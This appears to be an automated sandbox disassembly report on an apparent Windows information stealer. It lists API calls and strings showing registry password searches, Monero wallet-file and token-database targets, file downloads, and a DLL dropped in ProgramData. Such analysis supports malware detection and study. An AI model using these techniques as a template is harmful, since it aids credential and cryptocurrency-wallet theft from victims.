                                    • lstrcat.KERNEL32(00000000,00381934), ref: 00367700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00367733
                                    • lstrcat.KERNEL32(00000000,00381938), ref: 0036774D
                                    • task.LIBCPMTD ref: 0036775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: 298e1579e751252b0a57255290d7747c31edef6a39ce778949bc7115f946bc97
                                    • Instruction ID: 0ee9878b74fdc559587f0acb56ab2988ecf28b0e39f370e3bc46c7554efd4134
                                    • Opcode Fuzzy Hash: 298e1579e751252b0a57255290d7747c31edef6a39ce778949bc7115f946bc97
                                    • Instruction Fuzzy Hash: 2A3161B1904104DBDB1AEBE0DC95DFF737AEB48301B509208F506672A5DF34AA86DBD0
                                    Function 003660F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00364800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                      • Part of subcall function 00364800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                    • InternetOpenA.WININET(00380DFB,00000001,00000000,00000000,00000000), ref: 0036615F
                                    • StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 00366197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003661DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00366203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0036622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0036625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00366299
                                    • InternetCloseHandle.WININET(?), ref: 003662A3
                                    • InternetCloseHandle.WININET(00000000), ref: 003662B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 13f388a7d2b5fb0f2b029fe9ca1f4c051a072da06f005ce8d8e17726615bd587
                                    • Instruction ID: a403c5bc6043181ffff0d541e10afd28e3be49aaf1229d4a9aadcc2fe9edd31b
                                    • Opcode Fuzzy Hash: 13f388a7d2b5fb0f2b029fe9ca1f4c051a072da06f005ce8d8e17726615bd587
                                    • Instruction Fuzzy Hash: 695173B1A00208ABDF31DF90CC5AFEE7779AB44741F108498F609AB1C0DB756A89CF95
                                    Function 003E012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 003E024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 003E035B
                                    • CatchIt.LIBVCRUNTIME ref: 003E03AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 003E04C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: 8ae3be54dbc54d6155fbb6650213a0380c0b73f90fc30f485e45d35570b41cff
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: 4EB1E031800269DFCF1ADFA6D9819AEB7B5FF04304F11466AE9116B292D3B0DE91CF91
                                    Function 00367330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0036739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00367411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0036746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003674B2
                                    • HeapFree.KERNEL32(00000000), ref: 003674B9
                                    • task.LIBCPMTD ref: 003675B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 4b839645896554dba0691768dd50eee3d1ff19e41e32b66400934b40130a54a9
                                    • Instruction ID: 76af9e5b89fa68f005e0f14335cddea63f87cb572019012425170a090b009237
                                    • Opcode Fuzzy Hash: 4b839645896554dba0691768dd50eee3d1ff19e41e32b66400934b40130a54a9
                                    • Instruction Fuzzy Hash: 8D615DB180425C9BDB25DB50CC55BDAB3B8BF48304F40C5E9E649AA145EFB06BC9CFA0
                                    Function 0036BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    • lstrlen.KERNEL32(00000000), ref: 0036BC6F
                                      • Part of subcall function 00378FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0036BC9D
                                    • lstrlen.KERNEL32(00000000), ref: 0036BD75
                                    • lstrlen.KERNEL32(00000000), ref: 0036BD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: c7f101e15ab36aa6ad578da2fb3ddd6c8e230d88a65344597b220e4fb1b2ff83
                                    • Instruction ID: 196331da5271d83515173f9a5517f1f34ea7a065894089bae89026d7ae1ec734
                                    • Opcode Fuzzy Hash: c7f101e15ab36aa6ad578da2fb3ddd6c8e230d88a65344597b220e4fb1b2ff83
                                    • Instruction Fuzzy Hash: 02B14A71910508ABCF26FBA0CD66DEE737DAF54300F508558F50BAB191EF386A48CB62
                                    Function 00376A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: d2a7529f4ab52c025a624537d980e4ec44d4675c1f1b0735a6149c43b069463b
                                    • Instruction ID: fa8b5701442e3c7c74955f00ccbd74fa8af7b57b13cca760f7f00c9edc4e1da1
                                    • Opcode Fuzzy Hash: d2a7529f4ab52c025a624537d980e4ec44d4675c1f1b0735a6149c43b069463b
                                    • Instruction Fuzzy Hash: E7F082B290C209EFD3A49FE0EC1975CBBB1EB04707F154299F609961D0C6B05AA0EB91
                                    Function 003708A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 00379850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,003708DC,C:\ProgramData\chrome.dll), ref: 00379871
                                      • Part of subcall function 0036A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0036A098
                                    • StrCmpCA.SHLWAPI(00000000,00F388D0), ref: 00370922
                                    • StrCmpCA.SHLWAPI(00000000,00F38860), ref: 00370B79
                                    • StrCmpCA.SHLWAPI(00000000,00F38870), ref: 00370A0C
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00370C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 003708CD
                                    • C:\ProgramData\chrome.dll, xrefs: 00370C30
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: 460ee369f7f9eda717a63267c576157d724f788b935bded2974f2555b59849a1
                                    • Instruction ID: 3e4cba1dc5ccb0115c902cf3935be93d6657c36e1968fdaf3e37d527458119eb
                                    • Opcode Fuzzy Hash: 460ee369f7f9eda717a63267c576157d724f788b935bded2974f2555b59849a1
                                    • Instruction Fuzzy Hash: 9BA175717002089FCB29EF64D996EED77BAAFD5300F10C16DE40E9F251DA349A09CB92
                                    Function 00369E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                    • wsprintfA.USER32 ref: 00369E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00369F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00369F17
                                    • lstrcat.KERNEL32(00000000,003812D8), ref: 00369F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00369F7C
                                    • Sleep.KERNEL32(00001388), ref: 0036A013
                                      • Part of subcall function 003799A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003799C5
                                      • Part of subcall function 003799A0: Process32First.KERNEL32(0036A056,00000128), ref: 003799D9
                                      • Part of subcall function 003799A0: Process32Next.KERNEL32(0036A056,00000128), ref: 003799F2
                                      • Part of subcall function 003799A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00379A4E
                                      • Part of subcall function 003799A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00379A6C
                                      • Part of subcall function 003799A0: CloseHandle.KERNEL32(00000000), ref: 00379A79
                                      • Part of subcall function 003799A0: CloseHandle.KERNEL32(0036A056), ref: 00379A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
                                    • Opcode ID: 2ee54c2dbceb64bccf446bd8965aba1c95448f9f1955ddd5152ff9e0493fdbf4
                                    • Instruction ID: b26bdc4fb63c2d8e06b37e87efeba1f8d535452a2c68beed9f999acc64b1e11f
                                    • Opcode Fuzzy Hash: 2ee54c2dbceb64bccf446bd8965aba1c95448f9f1955ddd5152ff9e0493fdbf4
                                    • Instruction Fuzzy Hash: B15185B1944308ABEB35DB60DC9AFDE7378AB44704F004598B60DAB2C1EB75AB84CF51
                                    Function 003DF9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 003DFA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 003DFA27
                                    • _ValidateLocalCookies.LIBCMT ref: 003DFAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 003DFADB
                                    • _ValidateLocalCookies.LIBCMT ref: 003DFB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: 28f3f13c4e4d701c87b7b351e7378d546bb5287081a753b43edeada426104d6e
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: 5941B232900218AFCF12DF69D880A9E7BA5BF49314F158266E81AAF391D7319911CF91
                                    Function 00365000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0036501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00365021
                                    • InternetOpenA.WININET(00380DE3,00000000,00000000,00000000,00000000), ref: 0036503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00365061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00365091
                                    • InternetCloseHandle.WININET(?), ref: 00365109
                                    • InternetCloseHandle.WININET(?), ref: 00365116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
